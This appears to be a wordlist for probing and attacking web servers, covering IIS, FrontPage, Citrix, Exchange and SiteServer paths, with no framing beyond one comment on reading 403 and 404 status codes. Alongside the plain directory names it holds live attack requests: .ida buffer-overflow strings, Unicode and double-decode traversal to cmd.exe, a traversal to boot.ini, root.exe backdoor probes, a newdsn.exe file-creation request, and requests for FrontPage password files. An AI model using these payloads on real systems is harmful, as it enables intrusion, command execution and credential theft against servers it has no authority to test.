.printer
/x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
.aspx
_AuthChangeUrl?
_fpclass/
_layouts/alllibs.htm
_layouts/settings.htm
_layouts/userinfo.htm
_mem_bin
_mem_bin/
_mem_bin/autoconfig.asp
_mem_bin/formslogin.asp
_private
_vti_adm
_vti_adm/
_vti_aut
_vti_aut/
_vti_bin
_vti_bin/
_vti_bin/_vti_aut/dvwssr.dll
_vti_bin/_vti_aut/fp30reg.dll
_vti_bin/_vti_aut/fp30reg.dll?1234=X
_vti_bin/fpcount.exe?Page=default.asp|Image=3
_vti_bin/shtml.dll
_vti_bin/shtml.dll/asdfghjkl
_vti_bin/shtml.exe/qwertyuiop
_vti_cnf
_vti_cnf/
_vti_log
_vti_log/
_vti_pvt
_vti_pvt/
_vti_pvt/administrator.pwd
_vti_pvt/administrators.pwd
_vti_pvt/authors.pwd
_vti_pvt/service.pwd
_vti_pvt/shtml.exe
_vti_pvt/users.pwd
_vti_script
_vti_txt
_WEB_INF/
AccessPlatform/
AccessPlatform/auth/
AccessPlatform/auth/clientscripts/
AccessPlatform/auth/clientscripts/cookies.js
AccessPlatform/auth/clientscripts/login.js
admin/
Admin/knowledge/dsmgr/users/GroupManager.asp
Admin/knowledge/dsmgr/users/UserManager.asp
administration
administration/
administrator/
adovbs.inc
adsamples
adsamples/
AdvWorks/equipment/catalog_type.asp
ajfhasdfgsagfakjhgd
archiv~1
archiv~1/
archi~1/
Archi~1/
asp
asp/
aspnet_client
aspnet_client/
aspnet_files/
asps
asps/
ASPSamp/AdvWorks/equipment/catalog_type.asp
aux.aspx
aux/
bin
bin/
bins
bins/
certcontrol/
certenroll/
certsrv/
CFIDE/Administrator/startstop.html
cgi
cgi-bin
cgi-bin/
cgi-bin/a1stats/a1disp.cgi
cgi-bin/htimage.exe?2,2
cgi-bin/htmlscript
cgi-bin/imagemap.exe?2,2
cgi/
checkapache.html
citrix/
Citrix//AccessPlatform/auth/clientscripts/cookies.js
citrix/AccessPlatform/auth/
citrix/AccessPlatform/auth/clientscripts/
Citrix/AccessPlatform/auth/clientscripts/login.js
Citrix/PNAgent/config.xml
clocktower
cmsample
cmsample/
common
common/
common~1
common~1/
con.aspx
con/
db
db/
domcfg.nsf/?open
Exadmin/
Exchange/
exchange/root.asp
ExchWeb/
forum.asp
forum_arc.asp
forum_professionnel.asp
fpsample
fpsample/
help
help/
iiasdmpwd/
iisadmin
iisadmin/
iisadmpwd
iisadmpwd/achg.htr
iisadmpwd/aexp.htr
iisadmpwd/aexp2.htr
iisadmpwd/aexp2b.htr
iisadmpwd/aexp3.htr
iisadmpwd/aexp4.htr
iisadmpwd/aexp4b.htr
iisadmpwd/anot.htr
iisadmpwd/anot3.htr
iishelp
iishelp/
iishelp/iis/misc/default.asp
iissamples
iissamples/
iissamples/exair/howitworks/Code.asp
iissamples/exair/howitworks/Codebrw1.asp
iissamples/exair/howitworks/Codebrws.asp
iissamples/sdk/asp/docs/codebrw2.asp
iissamples/sdk/asp/docs/codebrws.asp
iissamples/sdk/asp/docs/CodeBrws.asp
images
images/
imprimer.asp
includes/adovbs.inc
index.php
index.shtml
inetpub
inetpub/
inetsrv
inetsrv/
isapi
isapi/
Mail/smtp/Admin/smadv.asp
market
Microsoft-Server-ActiveSync/
Micros~1
Micros~1/
msadc
msadc/
msadc/Samples/selector/showcode.asp
msdac/root.exe?/c+dir
mspress30
null.htw
OMA/
OWA/
pbserver
pbserver/
pbserver/pbserver.dll
postinfo.html
printers
printers/
progra~1
Progra~1
Public/
publisher
qwertypoiu.htw
qwertypoiu.printer
rubrique.asp
samples
samples/
scripts
scripts/
scripts/cgimail.exe
scripts/convert.bas
scripts/counter.exe
scripts/fpcount.exe
scripts/iisadmin/ism.dll?http/dir
scripts/no-such-file.pl
scripts/root.exe?/c+dir
scripts/samples
scripts/samples/
scripts/samples/search/webhits.exe
scripts/tools
scripts/tools/
scripts/tools/getdrvs.exe
scripts/tools/newdsn.exe
search?NS-query-pat=..\..\..\..\..\boot.ini
share/
sites
sites/
Sites/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp
Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Push/ViewCode.asp
Sites/Samples/Knowledge/Search/ViewCode.asp
siteserver
siteserver/
SiteServer/Admin
SiteServer/Admin/commerce/foundation/driver.asp
SiteServer/Admin/commerce/foundation/DSN.asp
SiteServer/admin/findvserver.asp
SiteServer/Admin/knowledge/dsmgr/default.asp
siteserver/publishing/viewcode.asp
SiteServer/Publishing/viewcode.asp
system
system/
system_web
system_web/
test/
tsweb/
vc30
web
WEB-INF/web.xml
Web.config
web/
webpub
webpub/
WebSer~1
winnt
winnt/
wwwroot
wwwroot/
x.cfm
x.htw
x.htx
x.ida
x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
x.idc
x.idq
x.pl
x.shtml
~/.asp
~/.aspx..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
a%5c.aspx
certsrv/mscep_admin
certsrv/mscep/mscep.dll
cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
# Look at the result codes in the headers - 403 likely mean the dir exists, 404 means not. It takes an ISAPI filter for IIS to return 404's for 403s.
_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
%NETHOOD%/
null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHilite
scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\
tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREA
_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir